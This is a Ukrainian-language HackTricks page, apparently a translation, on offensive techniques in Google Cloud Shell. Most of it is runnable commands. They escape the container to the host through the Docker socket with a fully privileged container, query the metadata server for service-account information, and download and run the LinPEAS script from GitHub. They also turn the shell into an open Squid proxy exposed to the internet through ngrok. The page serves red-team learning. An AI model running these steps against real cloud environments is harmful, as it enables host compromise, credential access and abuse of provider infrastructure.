Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert) ! Інші способи підтримки HackTricks:
Якщо ви хочете побачити вашу компанію в рекламі HackTricks або завантажити HackTricks у PDF Перевірте ПЛАНИ ПІДПИСКИ
Cloud Shell
Для отримання додаткової інформації про Cloud Shell перегляньте:
page GCP - Cloud Shell Enum Втеча з контейнера
Зверніть увагу, що Google Cloud Shell працює всередині контейнера, ви можете легко вийти на хост виконавши:
Copy sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh Це не вважається уразливістю Google, але це дає вам ширший огляд того, що відбувається в цьому середовищі.
Крім того, зверніть увагу, що з хоста ви можете знайти токен облікового запису служби:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/ З наступними обсягами:
Copy wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write Отримати метадані за допомогою LinPEAS:
Copy cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud Після використання https://github.com/carlospolop/bf_my_gcp_permissions з токеном облікового запису служби дозволів не було виявлено ...
Використання як проксі
Якщо ви хочете використовувати екземпляр оболонки Google Cloud як проксі, вам потрібно виконати наступні команди (або вставити їх у файл .bashrc):
Copy sudo apt install -y squid Тільки щоб ви знали, Squid - це http-проксі-сервер. Створіть файл squid.conf з наступними налаштуваннями:
Copy http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0 .0.0/0
http_access allow all скопіюйте файл squid.conf до /etc/squid
Copy sudo cp squid.conf /etc/squid Нарешті запустіть службу squid:
Copy sudo service squid start Використовуйте ngrok, щоб проксі був доступний ззовні:
Після запуску скопіюйте URL tcp://. Якщо ви хочете запустити проксі з браузера, рекомендується видалити частину tcp:// та порт і вставити порт у поле порту налаштувань проксі вашого браузера (squid - це http-проксі-сервер).
Для кращого використання при запуску файл .bashrc повинен містити наступні рядки:
Copy sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok ; ./ngrok tcp 3128 Інструкції були скопійовані з https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key . Перевірте цю сторінку для інших незвичайних ідей щодо запуску будь-якого виду програмного забезпечення (баз даних навіть Windows) в Cloud Shell.
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert) ! Інші способи підтримки HackTricks:
Якщо ви хочете побачити свою компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF , перевірте ПЛАНИ ПІДПИСКИ
